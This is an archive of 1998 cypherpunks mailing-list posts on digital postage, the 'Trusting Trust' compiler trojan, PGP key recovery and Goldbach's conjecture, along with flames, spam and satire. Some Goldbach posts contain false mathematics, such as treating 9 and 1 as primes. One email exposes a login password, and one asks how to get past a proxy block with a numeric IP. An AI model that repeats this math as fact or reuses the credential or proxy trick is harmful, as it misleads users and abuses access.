Subject: Re: A tad more on Goldbach's... (fwd)
Message-ID: <199811240217.UAA23902@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 23 Nov 1998 18:06:11 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: A tad more on Goldbach's...

> Ditto for your bizarre theories about how electric fields work, about how
> charges inside conducting spheres don't follow Gauss's Law, and other
> crankish theories about electricity.

Bullshit Tim. I NEVER said that. You and the other physics geniuses who
stated that an internal charge on a conducting sphere doesn't get propogated
out to the surface of the sphere are the ones who are claiming that Gauss'
Law doesn't apply.

Don't give me credit for your stupidity.

You give it a rest.



    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <ryan@systemics.ai>
Date: Tue, 24 Nov 1998 09:28:57 +0800
To: Robert Hettinga <dbs@philodox.com
Subject: Re: Digital bearer postage stamps
In-Reply-To: <v04020a0ab27eeb6523df@[62.136.62.81]>
Message-ID: <19981123210116.C1071@arianrhod.@>
MIME-Version: 1.0
Content-Type: text/plain



Quoting Robert Hettinga (rah@shipwright.com):
> I wonder if these guys have heard of double spending?
> 
> Does anyone know whether this is some kind of 2-d barcode (it must be) or
> is it something else?
> 
> Cheers,
> Robert Hettinga

It's a 2-d barcode, with a bunch of info encoded into it..

Short answer: they use statistical security measures to prevent double
spending, but they have a *scary* reputation and limitless resources
to pursue fraud, something no one else really has.  I would not be
brave enough to double spend with this system from my home state, if
I were in the US.

Longer rambling answer:

The E-stamp folks are pretty hardcore as far as security goes, I recall.
They use a Dallas Semiconductor iButton (plug: check out the ibuttonpunks
mailing list....) as a local value store, after paying for postage
at a central location, and do other security measures I don't quite
recall -- perhaps encoding your local post office, such that the local
post office could keep its own database of double spenders, or having
a global double spending database.

The post office is pretty much protected from fraud, in any case -- much
more than existing letters (which can be forged against high-speed
equipment using a phosophor pen).

I'm not sure how E-stamp protects itself from fraud, or protects its
customers from E-stamp committing fraud, but I'm fairly convinced there is
at least statistical security for the USPS against users.

I believe the USPS published a standard during the search for a new
postage system -- they did a pretty good job of it, I just never bothered
to buy a copy.  If someone bought a copy and mailed it to jya, it would
be doing everyone a service.

(Even if you have the nerve to commit bank wire fraud, check fraud, armed
robbery, espionage, sedition, etc., you probably still aren't brave/reckless
enough to commit postal fraud, though -- USPS inspectors make IRS
auditors look passive)


Cheers,
Ryan
ryan@venona.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@pobox.com>
Date: Tue, 24 Nov 1998 14:40:24 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Is Open Source safe? [Linux Weekly News]
In-Reply-To: <199811230327.VAA20072@einstein.ssz.com>
Message-ID: <v03102803b27ffb12efc6@[17.219.105.235]>
MIME-Version: 1.0
Content-Type: text/plain



Vlad Stesin <rmiles@Generation.NET> writes:

>I don't quite understand the logic behind this. The fact that the
>program's source is available is itself a proof that there are no
>backdoors. Anyone can read the source code and make sure it's OK.
>

You're missing the point that Thompson and Ritchie made in
"Reflections on Trusting Trust." To summarize:
1. They added a Trojan Horse function to the login sources.
2. They added code to the C compiler that recognized the
   login source code and inserted the Trojan Horse function,
   then they erased it from the login sources.
3. They added code to the C compiler that recognized the
   C compiler sources and added the code noted in step 2 above.
4. They then erased the source from the C compiler.

Now,
1. If you recompile login using a distributed C compiler, the
   Trojan Horse will be added to the executable, but will not
   be visible in the source.
2. If you recompile the C compiler using an existing C compiler,
   it will add the Trojan Horse insertion function, but this,
   too, will not be visible in the C sources.

I might have missed a step or two here, but you probably get
the picture. The only way to detect the Trojan Horse is to
read the executables. In the actual case, if I remember
correctly, Ken and Dennis didn't try to conceal all their
tracks, so the Trojan Horse was visible in the global symbol
(nm) listing.

>From personal experience, I am aware of at least one manufacturer
of safety-critical computer-controlled hardware who read the
assembly language output by the compiler to validate the actual
machine instructions that were generated.

Martin Minow
minow@pobox.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 24 Nov 1998 07:44:21 +0800
To: ddt@lsd.com
Subject: building a better zyklon-B (Re: KRA on ADK vs KR, NAI membership)
In-Reply-To: <v04103107b27b5d36a9fe@[204.179.136.12]>
Message-ID: <199811232255.WAA17039@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Writing about PGP's key recovery mechanism (CMR (Commercial Message
Recovery) or ADK (Additional Decryption Key)), Dave Del Torto quotes
from a letter he sent to info@kra.org:

> I'm not aware of the KRA's public position on the recovery of
> plaintext using cryptographically sound and ethically responsible
> alternatives to the escrowing of keys in organizational situations,
> e.g. PGP's Additional Decryption Key (ADK) mechanism.

I don't see that ethics has any bearing on the difference between Key
Escrow, and PGP's CMR "message recovery" design.  They are both just
yet another protocol to allow third parties to decrypt encrypted
traffic.

Ethics enter into the discussion when one one starts to argue about
which third parties will be able to eavesdrop on the traffic.  This
issue is largely orthogonal to the general technique used.

Parties which people are most concerned about having access to data
are the spooks and governments via organisations such as NSA, GCHQ,
ECHELON etc.  In a commercial setting there is also some political
debate about whether the employee has any expectation of privacy.

One might also argue about whether it is ethical to design software
which helps or makes it easy for third parties to gain access to the
plaintext in general.

> What is the KRA's public position on PGP's ADK?

So one has to be clear of one's aims in asking KRA if they think PGP's
CMR or ADK is a nice technology for adding NSA backdoors to crypto.
Say, for example that they decided that CMR is neater than their CKRB
mechanism.  Now what?  NSA/KRA lobby companies to include a modified
CMR with the NSA's public key as a mandatory additional recipient?
And NAI gets `asked' by the NSA to burn an NSA public key into PGP 7.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 4details@bitsmart.com
Date: Tue, 24 Nov 1998 09:18:45 +0800
To: <cypherpunks@Algebra.COM>
Subject: Export Market for Security Products
Message-ID: <199811240047.SAA25442@galaxy.galstar.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear reader,

We have just visited your website and became interested in developing a long-term trading relationship with your company. 

We are the largest manufacturer of video door phones, specializing in a full range of security systems. Strong alliances have 
been established with many industries, such as: design institutes, building developers, construction and engineering firms, 
and real estate companies, etc. Our annual sales volume for 1997 was approximately US$ 10 million.

Our core business is producing standard OEM & ODM security products that meet the individual needs of our customer's designs. 
Our quality control measures are strictly followed, from the very beginning of material development, until the goods are 
released to our customers.

For full details on our company's profile, products, and distributorship / licensing agreements, please reply now.

mailto:4details@bitsmart.com?Subject=VIDEO_DOOR_PHONES
mailto:4details@bitsmart.com?Subject=DOOR_PHONES
mailto:4details@bitsmart.com?Subject=SECURITY_PRODUCTS

We look forward to your soonest reply!

Thank you very much in advance.

Sincerely yours,

Mr. White Van
Export Sales Manager

Shenzhen Bailan Industrial Development Co., Ltd.
Sales & Marketing Dept.
Address: A 505, 5F, Build SEG Science Park, 
North. HuaQuing Road
Shenzhen China

Tel.  (86)-755-376 2520  (8 Lines)    P.C.     	51828
Fax.  (86)-755-332 1197               Pager:	191-548 4749
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Tue, 24 Nov 1998 07:16:22 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Goldbach's Conjecture - the various definitions
In-Reply-To: <199811201329.HAA10119@einstein.ssz.com>
Message-ID: <3.0.3.32.19981124060343.009788e0@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/plain



At 07:29 20/11/98 -0600, you wrote:
>Now before somebody gets a bee in their bonnet....
>
>Yes, the VNR has a typo in respect to the '6', it should be >2.
>
>As to the various other definitions that folks have been submitting. I'm not
>real sure what their exact point is since it's agreed by all that it's:
>
>...all even numbers greater than 2..., and Goldbach believed it had to be
>three prime factors while Fermat pointed out it could always be 2.

Math works because in most (we would like to say all...) cases it is WELL
DEFINED. Subtle differences in the definition of a problem can drastically
alter the solution. Goldbach's Conjecture states that any EVEN OR ODD
number can be expressed by a sum of three primes. The reduction only speaks
of EVEN numbers. They are EQUIVALENT but not exactly the same thing. Don't
lose sight of the domains of the two statements. He never stated that ODD
numbers could be expressed as sums of TWO primes.

It is very important to get all of the information assembled before running
out to test the conjecture! Goldbach's original conjecture allowed for even
numbers to be done with two primes but since it included the odd numbers
too, he had to allow for a third prime. 


>
>As to the two defintions that accredit the reduction from 3 to 2 to Goldbach
>while leaving Fermat out of the picture fail to explain why Fermat's point
>is called Fermat's in the first place.
>

Kind of an aside to this, I was playing with the ideas of repetitious
members of the sum and found that most numbers can be expressed by a lot of
different combinations of different primes. That is
17=11+3+3=11+3+1=9+5+3=7+5+5, etc. The higher the number the more
combinations possible. I only worked with prime numbers as the result of
the sum. But cursory inspection leads to the conclusion that all numbers
can be expressed in many ways by sums of two and three primes. Depending on
where you start to calculate (2,3,4,5,6, ...) as the first number you can
always use 3 as the third prime when summing to an odd number, Therefor
after a certain point you don't need to include 1 (as Goldbach appears to
have allowed in his original conjecture).

I would like to know if there is ANY number n>7 for which only one sum of
primes may be found. Since there were so many possible combinations, it
seems that you can take or leave the restriction of no repeats. But, if
there exists some number for which only one possible combination exists
then perhaps there exists a number for which the one and only combination
has a repeated component.

When I get a few more minutes to tinker with this I'll try to run some
tests to find such a number. 

I used do this type of tinkering in high school. If I had had a PII 300 and
MathCAD back then I would have never left Mathematics!! It was quite fun
seeing the multiple solutions popping out. 

APF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Tue, 24 Nov 1998 16:53:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: A tad more on Goldbach's...
Message-ID: <19981124082003.1500.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May scolds Jim Choate:

> Ditto for your bizarre theories about how electric fields work, about how
> charges inside conducting spheres don't follow Gauss's Law, and other
> crankish theories about electricity.
> 
> Give it a rest.

No doubt it would be rude to point out that it was Tim May's aggressive
defense of off-topic postings that has made cypherpunks a safe haven
for the likes of Jim Choate.

As for Choate, perhaps his least charming trait is his insistence on
posting his incoming private email to the mailing list, as though
cypherpunks were his personal mailbox.  He even scolds people who have
the courtesy to take off-topic discussions to private email.

This behavior is exactly the opposite of appropriate mailing list
etiquette.  Choate is like a little boy who feels a fart coming on when in
the bathroom, and who runs into the living room to share it with guests.
His particular stench has been fouling the list for far too long.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 24 Nov 1998 17:11:41 +0800
To: cypherpunks@toad.com
Subject: Space Aliens Address cpunx
Message-ID: <199811240839.JAA02315@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

[Bienfait Nutly News] THE COALDUST SALOON, SCENE OF MUCH DEBAUCHERY 
of late, was host tonight to Guest Sprinkler Jeff Gordon on the 
annual Golden Showers of Nuggets celebration of Notable Peons, with 
numerous notable peed-ons in drunken attendance (when not 
staggering outside to do some notable peeing-on, themselves).

Lamely trying to establish some common philosophical ground with the 
rowdy crowd, Jeff tried to cast his organization's mission as 
embodying "less is more." Realizing that "you have less, we have 
more" is not exactly what the Taoist concept means, the attendees 
raised catcalls to a pitch sufficient to shatter beer mugs within 
a radius of 100 yards. That in turn led to outpourings of grief so 
profound that Jeff was momentarily forgotten in the frenzy to order 
refills.

Trying another tack, Jeff launched into his "Nation of Laws" speech, 
ignoring shouted questions about selective prosecution, 
institutional revenge-taking, political hit lists, taxpayer 
suicides, and his organization's complicity in incidents of 
mysterious death more numerous than those trailing behind El Prez 
Klinton himself. When he delivered the line about "the price we pay 
for a civilized society," the extremes of apoplectic laughter so 
engendered were alarming enough that he paused in the interest of 
avoiding the necessity to explain deaths of attendees by traumatic 
mirth to the Canadian authorities. When he resumed, so many of the 
recovering crowd had gone to the restrooms to clean themselves up 
after pissing their pants and some of them vomiting from the effect 
of convulsive laughter that his later points were largely lost.

The question and answer period was somewhat stunted by Jeff's 
seemingly uncontrollable habit of asking each questioner's SS 
number. He didn't seem to comprehend that out of his usual 
institutional context such requests set off everyone's alarm bells, 
being the hyperparanoid rebel fucks that they are.

Of those who persisted, two threw Jeff curve balls he seemed 
unprepared to catch. One asked him his relationship to the Gordon 
who penned the Treasury's notorious Gordon Report of 1981, in which 
the author proposed using Letters of Marque and Reprisal against 
uncooperative tax haven nations, denying their flag airlines 
landing rights in the U.S., and blatantly stated that the U.S. must 
use every means at its disposal to pressure other nations to change 
their laws, even their constitutions, if necessary, to conform with 
the wishes of the U.S. Treasury and submit themselves to U.S. 
extraterritorial jurisdiction. Jeff seemed flustered, then changed 
the subject. 

The other asked him if it wasn't true that since the USG can create 
money at will out of thin air, and that therefore tax collections 
are obviously not needed to run the government, but that since 
increasing the money supply one-sidedly to fund government would 
obviously lead to hyperinflation, that the true function of the 
income tax and therefore the IRS is to take money out of 
circulation and destroy it to keep the money supply in balance. 
Jeff stammered, a few syllables slipping out as if to ask, "How did 
you...? who told you...?" Jeff hurriedly gathered his things and 
made his exit, trailed by the slow-thinking guer^H^H^Horillas he 
brought as bodyguards, his APC kicking up streams of packed snow as 
he sped away down the road.

Declan "Chainsaw" McCullough didn't seem to notice Jeff's premature 
withdrawal (as, indeed, he hadn't seemed to notice Jeff's entrance), 
and continued trying to charm two buxom blonde reportwhores with his 
tales of journalistic derring-do and wildly exaggerated claims of 
his manly proportions.

Blanc, tiring of this reportwhore's incessant questions about her 
panties, settled the issue once and for all (or at least for _that_ 
evening) by slipping them off while seated, and placing them over my 
head in such a way that I could see out the legholes while inhaling 
her womanly fragrance. My dizziness prevented me from noticing much 
else for the rest of the evening, my reaction to The Scent being not 
unlike that of a cat to catnip. I was told later that after 
collapsing to the floor I squirmed my way from table to table, 
making the complete circuit of the Coal Dust Saloon, confirming 
everyone's suspicions that I can't be taken anywhere. But then, 
neither can they.

I was recovered enough at night's end to help with the ritual 
decontamination of the Saloon that always follows the infectious 
presence of government thugs. In addition to the spiritual 
cleansing, some half-dozen subminiature bugging devices were 
recovered, followed by much entertaining speculation on which local 
asswipe they should be planted on to encourage the most dangerous 
life forms around to feed on each other.

TruthMonger

"Just because you have part of me locked up doesn't mean you 
have all of me locked up."

When I heard them say,

"You have the right to remain bent over. Anything you say or we 
imagine you said or would like to tell people you said can and 
will be used against you. You have the right to an attorney 
who works for us. If you cannot afford one, an attorney will 
be provided to help you cop a plea. Your ass belongs to us,"

I realized the Revolution had already begun.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNIOCSM5WpAclQcU1AQEayQQAxK8pV2vaImguCj6dmGBTvzWrkgZWMwIy
dfxDsf2akW+tbKZlj2PhMSrR1akBEd0LEsbekVf0bP7d/EAzNAMtB2FUezFhEtE3
BrV6fodfNzNsMMSR/i+tb+wN/6vSYXyqJmCyTfIzUnmHFHvtNf0WfIbEZi6wliQi
KtsjgvL3A2A=
=kYIE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ZDU Email <ZDUEmail@mail.training.com>
Date: Wed, 25 Nov 1998 01:26:40 +0800
To: "'cypherpunks@toad.com>
Subject: Welcome to ZDU
Message-ID: <EF1E9C0A1180D2119C9D00104B65C8CA077D4D@mail.training.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for subscribing to ZDU.
The information you need to login to ZDU from our Home Page
at http://www.zdu.com is as follows:

User Name:  Jolly
Password:   HRS59VTF            

Please note: the username is case sensitive, e.g. the mixed case 'XyZzY'
is not the same as the all lower case 'xyzzy'.



We hope that you enjoy our site!
 --The ZDU Staff

Ref:[\\650363-1\\]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick Hinsberger " <P.Hinsberger@globus.net>
Date: Tue, 24 Nov 1998 17:56:56 +0800
To: cypherpunks-unedited@toad.com
Subject: IP-Adresses
Message-ID: <365A79AE.7FE2AAE4@globus.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

my English is fuck, but I hope that anybody unerstand me <bg>
If I`ve got a IP-Adress, f.E. 126.0.202.146 and our proxy denies this
Adress, I can transform this adress in one number...
((126*256)+0)*256+202)*256+146 = 7E 00 CA 92
Is there a mistake?

Can I connect with this adress to a Website? (Netscape Navigator and
Proxy from Bull Systems...)

-@Hinse@-

Please give reply direct to my E-Mail adress, and not to the group...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 25 Nov 1998 02:50:59 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: A bit more on Goldbach's and Primes
Message-ID: <199811241801.MAA26092@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text




Goldbach's Conjecture:

Any even number >2 can be represented as the sum of two prime numbers.


Goldbach's Extension:

Any even number >=6 can be represented as the sum of three even numbers. 2
plus two evens that are each 1 less than a prime.


Process:

1.	Pick an even number
2.	Select largest prime that is smaller by at least 4.
3.	Add 1.
4.	The difference between 1 and 3 should be a p-1. Add one to the
	difference and it must be in the list of primes. If it's not then
	go back to 2. and select the next smaller prime because the odd
        number that comes from (p-1)+1 isn't prime for that prime.


Observation:

This technique could be used to extrapolate potential unknown primes from
known primes since it produces a much smaller list of potential candidates 
than simply testing consecutive odds via a sieve. It also is not as porous
as Mersenne Prime tests.

2+(largest_known_prime-1)+(next_smallest_unknown_prime-1)=big_even_number

So, we need a way of guestimating the magnitude of the next prime and pick
big_even_numbers that are appropriate.

Observation: For a given x the number of primes <x is limited by x/ln(x).
             So we could note the points where x/ln(x) increases by 1.


Even Number Sum's:

 6, 2+2+2
 8, 2+2+4
 10, 2+2+6
 12, 2+4+6
 14, 2+6+6
 18, 2+4+12
 20, 2+2+16
 22, 2+2+18
 24, 2+4+18
 26, 2+6+18
 28, 2+4+22
 30, 2+6+22
 32, 2+2+28
 34, 2+2+30
 36, 2+4+30
 38, 2+6+30
 40, 2+2+36

...

100, 2+2+96

...

398, 2+8+388     Note: this breaks since 8 isn't available. 9 ain't a
                       prime.

     2+14+382          next smaller doesn't work since 14 isn't there.
                       15 isn't prime.

     2+18+378          that one works!

...

666, 2+4+660

...

758, 2+6+750

...

1,032, 2+10+1020

...

1,044, 2+4+1038

...

6,236, 2+6+6228

...

7,920, 2+12+7906	Note: can't use 7,919 since it's delta is <4.


Iterated Sums:

2+2+2=6
2+2+4=8
2+2+6=10
2+2+10=14

2+4+2=8
2+4+4=10
2+4+6=12
2+4+10=16

2+6+2=10
2+6+4=12
2+6+6=14
2+6+10=18


1st 1,000 Primes & their p-1's:

      p         p-1
 -------------------------------

      2         1
      3		2
      5		4
      7		6
     11		10
     13		12
     17 	16
     19		18
     23		22
     29		28
     31		30
     37		36
     41		40
     43		42
     47		46
     53		52
     59		58
     61 	60
     67		66
     71		70
     73		72
     79		78
     83		82
     89		88
     97		96
    101 	100
    103
    107
    109
    113


    127    131    137    139    149    151    157    163    167    173


    179    181    191    193    197    199    211    223    227    229


    233    239    241    251    257    263    269    271    277    281


    283    293    307    311    313    317    331    337    347    349


    353    359    367    373    379    383    389    397    401    409


    419    421    431    433    439    443    449    457    461    463

    467    479    487    491    499    503    509    521    523    541

    547    557    563    569    571    577    587    593    599    601

    607    613    617    619    631    641    643    647    653    659

    661    673    677    683    691    701    709    719    727    733

    739    743    751    757    761    769    773    787    797    809

    811    821    823    827    829    839    853    857    859    863

    877    881    883    887    907    911    919    929    937    941

    947    953    967    971    977    983    991    997   1009   1013

   1019   1021   1031   1033   1039   1049   1051   1061   1063   1069

   1087   1091   1093   1097   1103   1109   1117   1123   1129   1151

   1153   1163   1171   1181   1187   1193   1201   1213   1217   1223

   1229   1231   1237   1249   1259   1277   1279   1283   1289   1291

   1297   1301   1303   1307   1319   1321   1327   1361   1367   1373

   1381   1399   1409   1423   1427   1429   1433   1439   1447   1451

   1453   1459   1471   1481   1483   1487   1489   1493   1499   1511

   1523   1531   1543   1549   1553   1559   1567   1571   1579   1583

   1597   1601   1607   1609   1613   1619   1621   1627   1637   1657

   1663   1667   1669   1693   1697   1699   1709   1721   1723   1733

   1741   1747   1753   1759   1777   1783   1787   1789   1801   1811

   1823   1831   1847   1861   1867   1871   1873   1877   1879   1889

   1901   1907   1913   1931   1933   1949   1951   1973   1979   1987

   1993   1997   1999   2003   2011   2017   2027   2029   2039   2053

   2063   2069   2081   2083   2087   2089   2099   2111   2113   2129

   2131   2137   2141   2143   2153   2161   2179   2203   2207   2213

   2221   2237   2239   2243   2251   2267   2269   2273   2281   2287

   2293   2297   2309   2311   2333   2339   2341   2347   2351   2357

   2371   2377   2381   2383   2389   2393   2399   2411   2417   2423

   2437   2441   2447   2459   2467   2473   2477   2503   2521   2531

   2539   2543   2549   2551   2557   2579   2591   2593   2609   2617

   2621   2633   2647   2657   2659   2663   2671   2677   2683   2687

   2689   2693   2699   2707   2711   2713   2719   2729   2731   2741

   2749   2753   2767   2777   2789   2791   2797   2801   2803   2819

   2833   2837   2843   2851   2857   2861   2879   2887   2897   2903

   2909   2917   2927   2939   2953   2957   2963   2969   2971   2999

   3001   3011   3019   3023   3037   3041   3049   3061   3067   3079

   3083   3089   3109   3119   3121   3137   3163   3167   3169   3181

   3187   3191   3203   3209   3217   3221   3229   3251   3253   3257

   3259   3271   3299   3301   3307   3313   3319   3323   3329   3331

   3343   3347   3359   3361   3371   3373   3389   3391   3407   3413

   3433   3449   3457   3461   3463   3467   3469   3491   3499   3511

   3517   3527   3529   3533   3539   3541   3547   3557   3559   3571

   3581   3583   3593   3607   3613   3617   3623   3631   3637   3643

   3659   3671   3673   3677   3691   3697   3701   3709   3719   3727

   3733   3739   3761   3767   3769   3779   3793   3797   3803   3821

   3823   3833   3847   3851   3853   3863   3877   3881   3889   3907

   3911   3917   3919   3923   3929   3931   3943   3947   3967   3989

   4001   4003   4007   4013   4019   4021   4027   4049   4051   4057

   4073   4079   4091   4093   4099   4111   4127   4129   4133   4139

   4153   4157   4159   4177   4201   4211   4217   4219   4229   4231

   4241   4243   4253   4259   4261   4271   4273   4283   4289   4297

   4327   4337   4339   4349   4357   4363   4373   4391   4397   4409

   4421   4423   4441   4447   4451   4457   4463   4481   4483   4493

   4507   4513   4517   4519   4523   4547   4549   4561   4567   4583

   4591   4597   4603   4621   4637   4639   4643   4649   4651   4657

   4663   4673   4679   4691   4703   4721   4723   4729   4733   4751

   4759   4783   4787   4789   4793   4799   4801   4813   4817   4831

   4861   4871   4877   4889   4903   4909   4919   4931   4933   4937

   4943   4951   4957   4967   4969   4973   4987   4993   4999   5003

   5009   5011   5021   5023   5039   5051   5059   5077   5081   5087

   5099   5101   5107   5113   5119   5147   5153   5167   5171   5179

   5189   5197   5209   5227   5231   5233   5237   5261   5273   5279

   5281   5297   5303   5309   5323   5333   5347   5351   5381   5387

   5393   5399   5407   5413   5417   5419   5431   5437   5441   5443

   5449   5471   5477   5479   5483   5501   5503   5507   5519   5521

   5527   5531   5557   5563   5569   5573   5581   5591   5623   5639

   5641   5647   5651   5653   5657   5659   5669   5683   5689   5693

   5701   5711   5717   5737   5741   5743   5749   5779   5783   5791

   5801   5807   5813   5821   5827   5839   5843   5849   5851   5857

   5861   5867   5869   5879   5881   5897   5903   5923   5927   5939

   5953   5981   5987   6007   6011   6029   6037   6043   6047   6053

   6067   6073   6079   6089   6091   6101   6113   6121   6131   6133

   6143   6151   6163   6173   6197   6199   6203   6211   6217   6221

   6229   6247   6257   6263   6269   6271   6277   6287   6299   6301

   6311   6317   6323   6329   6337   6343   6353   6359   6361   6367

   6373   6379   6389   6397   6421   6427   6449   6451   6469   6473

   6481   6491   6521   6529   6547   6551   6553   6563   6569   6571

   6577   6581   6599   6607   6619   6637   6653   6659   6661   6673

   6679   6689   6691   6701   6703   6709   6719   6733   6737   6761

   6763   6779   6781   6791   6793   6803   6823   6827   6829   6833

   6841   6857   6863   6869   6871   6883   6899   6907   6911   6917

   6947   6949   6959   6961   6967   6971   6977   6983   6991   6997

   7001   7013   7019   7027   7039   7043   7057   7069   7079   7103

   7109   7121   7127   7129   7151   7159   7177   7187   7193   7207

   7211   7213   7219   7229   7237   7243   7247   7253   7283   7297

   7307   7309   7321   7331   7333   7349   7351   7369   7393   7411

   7417   7433   7451   7457   7459   7477   7481   7487   7489   7499

   7507   7517   7523   7529   7537   7541   7547   7549   7559   7561

   7573   7577   7583   7589   7591   7603   7607   7621   7639   7643

   7649   7669   7673   7681   7687   7691   7699   7703   7717   7723

   7727   7741   7753   7757   7759   7789   7793   7817   7823   7829

   7841   7853   7867   7873   7877   7879   7883   7901   7907   7919




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 25 Nov 1998 03:14:26 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: How to unsubscribe
Message-ID: <199811241839.MAA26332@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Happy Thanksgiving!

Forwarded message:

> From owner-cypherpunks@ssz.com Tue Nov 24 12:35:18 1998
> Message-ID: <365B0981.966548AE@192.168.100.6>
> Date: Tue, 24 Nov 1998 19:31:13 +0000
> From: Maxim Bugaenko <max@192.168.100.6>
> Reply-To: slaike@mika.dp.ua
> X-Mailer: Mozilla 4.05 [en] (WinNT; I)
> MIME-Version: 1.0
> To: cypherpunks@toad.com
> Subject: unscribe
> Content-Type: text/plain; charset=koi8-r
> Content-Transfer-Encoding: 7bit
> Sender: owner-cypherpunks@einstein.ssz.com
> Precedence: bulk
> X-Mailing-List: cypherpunks@ssz.com
> X-List-Admin: list@ssz.com
> X-Loop: ssz.com
> X-Language: English, Russian, German
> 
> 

1. You MUST spell correctly.

2. send a message to majordomo@domain.name with an empty title and the
   body consisting of 'unsubscribe <your_subscribed_email_address>'.

Note that if you don't unsubscribe from the same account you subscribed with
it will fail.



    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 25 Nov 1998 04:11:50 +0800
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Subject: Re: A bit more on Goldbach's and Primes
In-Reply-To: <199811241801.MAA26092@einstein.ssz.com>
Message-ID: <199811241918.NAA00906@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Jim Choate wrote:
> 
> 
> 
> Goldbach's Conjecture:
> 
> Any even number >2 can be represented as the sum of two prime numbers.
> 
> 
> Goldbach's Extension:
> 
> Any even number >=6 can be represented as the sum of three even numbers. 2
> plus two evens that are each 1 less than a prime.

Jim,

The "extension" is just a trivial consequence of the original conjecture.

Proof: Take any even number N >= 6.

According to the original conjecture, there are two prime numbers P1 and
P2 such that N=p1+p2.

Rewriting this: N = 2 + (p1-1) + (p2-1).

That is, two plus two evens that are each one less than a prime.

That's eighth grade math.

> 
> Process:
> 
> 1.	Pick an even number
> 2.	Select largest prime that is smaller by at least 4.
> 3.	Add 1.
> 4.	The difference between 1 and 3 should be a p-1. Add one to the
> 	difference and it must be in the list of primes. If it's not then

if it is not then it must have not been in the list of primes.

> 	go back to 2. and select the next smaller prime because the odd
>         number that comes from (p-1)+1 isn't prime for that prime.
> 
> 
> Observation:
> 
> This technique could be used to extrapolate potential unknown primes from
> known primes since it produces a much smaller list of potential candidates 
> than simply testing consecutive odds via a sieve. It also is not as porous
> as Mersenne Prime tests.

Bullshit.

Your "technique" ASSUMES that you already know the "largest prime that
is smaller by at least 4".

> 2+(largest_known_prime-1)+(next_smallest_unknown_prime-1)=big_even_number
> 
> So, we need a way of guestimating the magnitude of the next prime and pick
> big_even_numbers that are appropriate.
> 
> Observation: For a given x the number of primes <x is limited by x/ln(x).
>              So we could note the points where x/ln(x) increases by 1.
> 

Your observation is incorrect.

Consider x = 8.  x/ln(x) =~ 3.84, but the number of primes < 8 (2,3,5,7) is
4, that is more than 8/ln(8).

I suggest checking observations more carefully.

igor

> Even Number Sum's:
> 
>  6, 2+2+2
>  8, 2+2+4
>  10, 2+2+6
>  12, 2+4+6
>  14, 2+6+6
>  18, 2+4+12
>  20, 2+2+16
>  22, 2+2+18
>  24, 2+4+18
>  26, 2+6+18
>  28, 2+4+22
>  30, 2+6+22
>  32, 2+2+28
>  34, 2+2+30
>  36, 2+4+30
>  38, 2+6+30
>  40, 2+2+36
> 
> ...
> 
> 100, 2+2+96
> 
> ...
> 
> 398, 2+8+388     Note: this breaks since 8 isn't available. 9 ain't a
>                        prime.
> 
>      2+14+382          next smaller doesn't work since 14 isn't there.
>                        15 isn't prime.
> 
>      2+18+378          that one works!
> 
> ...
> 
> 666, 2+4+660
> 
> ...
> 
> 758, 2+6+750
> 
> ...
> 
> 1,032, 2+10+1020
> 
> ...
> 
> 1,044, 2+4+1038
> 
> ...
> 
> 6,236, 2+6+6228
> 
> ...
> 
> 7,920, 2+12+7906	Note: can't use 7,919 since it's delta is <4.
> 
> 
> Iterated Sums:
> 
> 2+2+2=6
> 2+2+4=8
> 2+2+6=10
> 2+2+10=14
> 
